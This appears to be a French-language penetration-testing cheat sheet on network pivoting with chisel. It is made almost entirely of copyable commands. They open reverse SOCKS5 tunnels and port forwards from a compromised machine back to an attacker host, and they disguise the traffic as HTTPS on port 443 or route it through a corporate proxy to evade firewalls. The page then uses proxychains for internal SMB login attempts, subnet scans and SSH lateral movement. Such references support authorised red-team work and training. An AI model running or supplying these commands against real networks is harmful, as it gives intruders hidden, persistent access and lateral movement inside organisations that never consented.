Pivoting

Chisel

Tunnels TCP/UDP over HTTP avec chisel : SOCKS5 reverse et port forwarding pour pivot réseau.

Tunnel de base

Copy command
chisel server --reverse --port 8080

Description: Démarrer le serveur chisel en mode reverse : la cible initie la connexion vers nous.

Copy command
chisel client $ATTACKER_IP:8080 R:socks

Description: Créer un proxy SOCKS5 reverse : tout le trafic routé via la machine compromise.

Copy command
chisel client $ATTACKER_IP:8080 R:$LOCAL_PORT:$INTERNAL_HOST:$REMOTE_PORT

Description: Port forward inverse : exposer un service interne directement sur notre machine.

Via un proxy HTTP

Copy command
chisel server --reverse --port 443 --tls-cert cert.pem --tls-key key.pem

Description: Chisel over TLS sur le port 443 : le trafic ressemble à du HTTPS pour les pare-feux.

Copy command
chisel client --proxy $PROXY_URL $ATTACKER_IP:8080 R:socks

Description: Tunneler chisel via un proxy HTTP d'entreprise : contourner les restrictions réseau.

Proxychains

Copy command
proxychains4 nxc smb $INTERNAL_TARGET -u $USER -p $PASS

Description: Utiliser proxychains via le SOCKS5 chisel pour atteindre des hosts internes.

Copy command
proxychains4 -q nmap -sT -Pn -p 22,80,443,445,3389 $INTERNAL_SUBNET

Description: Scanner le réseau interne via proxychains : -sT obligatoire (pas de raw socket via SOCKS).

Copy command
proxychains4 ssh $USER@$INTERNAL_HOST

Description: SSH vers un host interne via le tunnel chisel : mouvement latéral discret.